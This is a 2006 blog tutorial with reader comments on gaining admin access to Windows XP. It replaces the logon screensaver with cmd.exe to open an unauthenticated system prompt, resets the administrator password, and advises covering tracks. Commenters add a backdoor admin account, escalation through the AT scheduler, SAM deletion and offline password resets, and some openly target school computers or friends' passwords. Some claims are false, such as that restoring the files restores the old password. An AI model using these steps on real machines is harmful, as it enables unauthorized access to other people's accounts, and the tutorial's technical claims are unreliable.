How to Hack a Window XP Admins Password
November 2nd, 2006 by Quinn Zerfas
This is a cool little computer trick for Microsoft Windows trick I’ve picked up in my travels and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Doug and you want the password 1234 then you would enter “net user Doug 1234″ and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.

Does putting the two files back restore the admin’s original password? Or will the admin not be able to log in afterwards?
hi guys…pls teach how to make windows xp not to log on after a month or two months…pls
watch this vid, it might solve your problems
http://www.metacafe.com/watch/376759/simple_way_on_how_to_hack_user_passwords_useful/
My command prompt doesnt work anymore i keep getting an error that says windows can not find cmd. Check the name? Whats going on. I did all that above and now nothing works. Thanks.
*JoSh*
yo, you can go to run and type in command prompt hit enter and it should open it in a different way so that wont happen anymore
man the problem is your computer may have got a virus which first destroyed the cmd.exe file.so please first try to scan your computer with either updated F-Secure or Kaspersky new version
You can go to note pad or open windows internet explorer and right click and clikc source then when one of those is open type command.com then save the file as Anything You Want.bat then close ti and open it again for a command promt!
Install “avira” antivirus in ur system
My command prompt doesnt work anymore i keep getting an error that says windows can not find cmd. Check the name? Whats going on. I did all that above and now nothing works. Thanks for the help!
*JoSh*
type “command” if “cmd” doesn’t work.
also “command.com” or “cmd.com” one of those four should work.
if it doesnt work u can email me for help
(teecehunter@yahoo.com)
It’s because you renamed your cmd.exe to logon.scr, what you need to do is take cmd.exe and logon.scr out of the temphack folder you made and put them back into the system32 folder.
and how do u move ur temphack folder bak to ur system32 folder?
Hey but that does’nt work bcoz my administrator deny the access even to change the name of the file …or delete the file
Does putting the two files back restore the admin’s original password? Or will the admin not be able to log in afterwards?
not working.. access denied
not working… access denied
can’t chang password.. net user administrator *
without login as power user
:(
wat is DOS
Yes, you are backing up theri login info, deleteing and making your own to get access. Puting the temphack files back is going to change restore the original information
uh.. no. First of all this is old. Second of all.. the original password WILL NOT be restored. Do you honestly think password hashes are stored in the command prompt executible or the screensaver????? Come on.. if you are going to give ‘hacking’ advice.. make sure you actually know what you’re talking about. So… where did you copy this info from?
Mike, no, restoring the files won’t restore the original password. The one you just created will still be in effect.
Quinn, you are just backing up the tools used to change the password. The “net password” actually changes the password in another part of the machine that you haven’t touched yourself.
No. You’re wrong. Once you change the local admin’s password, thats all she wrote. Unless you know his/her password already (so you can change it back), once you change it, it’s gone from the system.
Also, this breach won’t work if the system has NTFS as the file system, unless you have administrative rights, you won’t be able to delete logon.scr
This post is full of holes.
If you want to learn about /real/ hacking, check out Binary Revolution.
No it won’t. You are replacing the screensaver (logonlscr) with a command prompt (cmd.exe). Putting the files back just puts the screensaver back the way it was, but not changing any other settings back.
The downside to this is you still need to be able to log in to move the files around :\
a slightly shorter way of doing the same thing:
cd\
cd\windows\system32
mkdir temphack
move logon.scr temphack\logon.scr
copy cmd.exe logon.scr
exit
This do not work with XP with a domain
can not move or delete logon.scr
if you have a solution to erase the admin password of my HP portable, i would be a,lot gratefull to you
Why don’t you just delete sam that is the easiest admin password hack.
logon.scr is a protected file, you need admin privs to delete it. IF you already have admin privs needed to do this, then you could just change the administrator password yourself.
So, this isn’t really a hack.
A hack that requires you to be logged into the machine to set up the hack isn’t a hack. If you’re already logged into the machine what do you need the hack for?
You are logged into the machine but not with administrative privileges. That’s what you need the hack for. And a brain, while you are at it.
I wrote a simpler way to do this a long time ago. If you have ANY admin access, you can just use the command to change any other user’s password without knowing it. This was all previously covered @
http://www.allthingsmarked.com/2006/08/21/change-your-xp-password-via-the-command-line/
I tried on computer in A+spec class with restricted access it doesn’t work when i tried to make directory temphack it says access denied HELP
try this http://ophcrack.sourceforge.net/. Works perfectly.
Brilliant! You just wiped the admins’s password and he’s going to be quite cross with you!
The two files you’ve copied DO NOT contain the Admin’s password which you can’t get that way.
You’d have to use something like the NTBACKUP and have it save the registry (System State). Restoring the registry, would of course wipe your hacked account.
You’re better off doing something like this instead:
net user i0wnU SkR1ptK!ddY /add
net localgroup Administrators i0wnU /add
This won’t add you to the domain, but will add you to the local machine.
Also, you’ll find that on a properly hardened system, you will not have permissions to overwrite the screensaver.
However, if you are allowed to run the windows scheduler via the AT command, you can schedule the above net commands to do the same thing without messing about with the screen saver. (Provided the scheduler runs as the SYSTEM or an Admin)
i.e.
AT 06:06 NET USER ….
AT 06:07 NET LOCALGROUP …
And Bob’s your uncle.
Cheers!
Wouldn’t you have to already have administrator privileges in order for this to work? I wouldn’t think a user that was only in the Users group would have permissions to overwrite those file on an NTFS filesystem. Perhaps the filesystem is FAT32?
Ever heard of ERD commander?…. that would be much easier if you can’t into the comp to begin with do to a lock out …
Hello I see that you had offered some advice to someone back in 2006 about my loERD commander i have the software. We’ll what my problem is. I have a hard drive that i am trying to access but it is protected with a bios password. How can i get around it with the locksmith or can you tell me what script i should be looking for in command line once opened in notepad so i can change the value of 0 or 1 i don’t want to overwrite the hard drive. Any feed back would be greatly appreciated.
Thanks in advance!!!
Normal system user does not have rights to copy, move , ren files in sys32. So useless useless you have rights to the C:.
This only works in Windows 2000 and prior. Does not work in XP/2003. You must have Admin rights to modify files/folders in %SYSTEMROOT%\System32 directory in XP/2003.
Anyway, once you have physical access to machine use: http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html
It’s a nice idea if you stick this on a USB stick and were scouring the school/office for unlocked, unattended PCs. As mentioned there are many better ways, but certainly this line would expose you straight away:
rename cmd.exe logon.scr
In effect you’ve moved cmd.exe meaning nobody on the machine can open a command prompt. Oops.
[...] To give you an idea of what does well on which sites, I will use my articles as example. This article about a simple Windows XP hack that my friend wrote did amazingly well on Digg and Reddit. They happened to both hit the homepage at the same time, which resulted in my site being down for an entire day. Simple cool tricks like this tend to do well on a lot of Digg-like sites. On Fark however, it did not get approved simply because it wasn’t funny in any way. This story was another big hit. It reached the homepage of Digg to later get buried (guess Diggers don’t like stuff like this) but did extremely well on Fark generating upwards of 6000 unique clicks. [...]
hello
i want to know how hack software and how have login
I don’t even know English so good, but I can tell you guyz that nothing of what you wrote works !!!
It works just if you are logged in with administrator account and you want to hack yourself … hahaha prety smart
neither the cd which changes the users passwords work
’cause may be the stupid admin set a password on the BIOS,
so you cant make it boot, and probably you don’t want him to see you breaking apart his notebook pc to pull out the battery
for 1 min.
notice that the most competent administrators are securing very well, so you dont have access to wherever the OS is installed, you cant make,del,rename folders and shi*,kill tasks..
you dont even see that..
Allthought the shi* you are talking about just does not works very well.
I hope next time I visit you’ll come up with something better…
MLADUSER
Nope. This does works on Windows XP (Most of the time). Some computers deny access while others do not. Luckily, our schools computers all have DeepFreeze so all I need to do to remove traces is to restart the computer.
Now, to turn this into a useful function quickly (lost admin password.. mistyped admin password, admin is AWOL) you could boot a nice Linux kernal, mount NTFS, and make the quick file change(s) that would then allow you to assign a new admin password.
I’ve never attempted to do this, but am going to file it away as a quick way to clean up a bad problem. I have had to pull a file from a PC and send it somewhere to have them hack the SAM file.
My XP-Pro is in a domain, and the Linux-life cd do not find the harddisk !
If you are logged in as an administrator the easiest way to change any password, including THE administrator, is simply to run ‘control userpasswords2′ (without quotes) from a command prompt, then change at will.
If I can’t even get into the beast as an administrator I use a linux bootdisk which allows me to reset any password. If there’s another way I’d be delighted to learn it here.
I tried many of the above options on my XP Pro version with Novell and yours worked great. I enter the ‘control userpasswords2′ command and was able to change the administrator password. Working for a school this is great for all the donated computers we get. Thank you!
Just restart the friggin machine and press f8 to log in under safe mode with networking. Then log in under the administrator whcih is usually passwordfree. Create you own username and then restart with admin privelages. Do whatever u want then restart with f8 safemode, go under administrator and delete the account u made!!!! wtf!!
or use this service– http://www.loginrecovery.com
This do not work with XP in a domain
if you have a better solution,
i wil be grateful to here about
actually there is a way to do this without logging in. you could use a windows 2000 installation disk and boot into the repair console to run the commands. while it is a windows 2000 disk, you can still use it to log into an xp installation. also a repair console from a windows xp disk will ask you for the administrator password whereas a win2k disk will not.
-cheers!
On our school computers,we have XP, but on the accounts that we log into are not the administrator accounts, so, they’ve locked us out of the Dos/Command prompt - Since we cannot access the command prompt, how can we bypass that?
you can create a batch file and have it say
” call c:\windows\system32\command”
ok so this a pretty dumb question.. but the slashes r reverse and i really cant find it.. how do i tyoe that in?
And on a side note - Logging into safemode period - the admin’s have disabled the “add a new user” thing - so therefore, I don’t think we can create a new user.
This will not work on XP (SP2 at least). The SYSTEM account no longer has the required access as it once had. Microsoft closed this hole. SYSTEM runs at a user level so when you try this hack you should receive SYSTEM ERROR 5 access denied or something to that effect.
Use the bootable Linux Offline password editor to “blank” the admin password. Works everytime, doesn’t require admin access, doesn’t require you to know the local admin name and is safe to use. I’ve used it multiple times for legit reasons when we needed to access laptops and desktops where the local admin wasn’t known or the account had been locked out. Hint: if you use this tool just change the local admin password to blank and don’t try setting one.
Enjoy…
This works not on my HP portable with XP-Pro with a domain
Linux can not find the HDD
the same occurs when i use a XP-cd to reinstall: no harddisk found
the reason why ur windows xp shows hard disk not found is bcos of the coruption of ur win xp.
so first go to boot screen and then change the hard disk mode to ide enabled
Any windows user worth their salt will be using NTFS and will have encrypted any security sensitive files.
Resetting the Admin password may allow access to NTFS but not encrypted files. For this the public and user keys are required.
Now a hack that allowed the Admin account password to be hacked whilst allowing permission securities to remain in place would be worth writing about!
Come on guys. You use the old ways. I use a USB flash or CD boot drive to bypass anything MS can secure. This boot drive uses its own operating system against it allowing me to write to the SAM as an unprotected file without corruption. Most newer mobo BIOS support booting from an alternate source without entering the BIOS. I can even fix bad boot records, copy any files I want, delete any files I want. So get with the program.
goto run. and type cmd
command promt appears.
type, net user
then type, net user adminis name *
password change option will come
change it and u have hacked xp
hae wen u do this the password option does not come up so therfore cannot change password.
my dad is the administrator and the only one with administrtive rights but he used a password that he hadnt used before that only he knew and now he cant remember it. is ther anything i can do to change his password
Thanks
OK, so we seem to have established that we can use Linux to blank or change the Administrator password (but thereby lose access to any encrypted files owned by the Administrator, until the password is changed back to its original setting) - Or we can change the Administrator password so long as we are logged into another account with administrator privileges. How can we find out the Administrator password without resetting it or having administrator privileges?
[...] Here is another great (simple) hack from the mind behind this story . It is a very simple way for Google to send you anyones Gmail password, and it is done in 5 steps! I can’t wait for the comments on this one. Here ya go: [...]
i wanna have my friend’s pass
i want to hack a friend’s password
Guys we are not getting the answer, how do we hack the Local Admin password or else how do we give ourselves local admin right? Without knowing existing Admin password
Thanks for the tip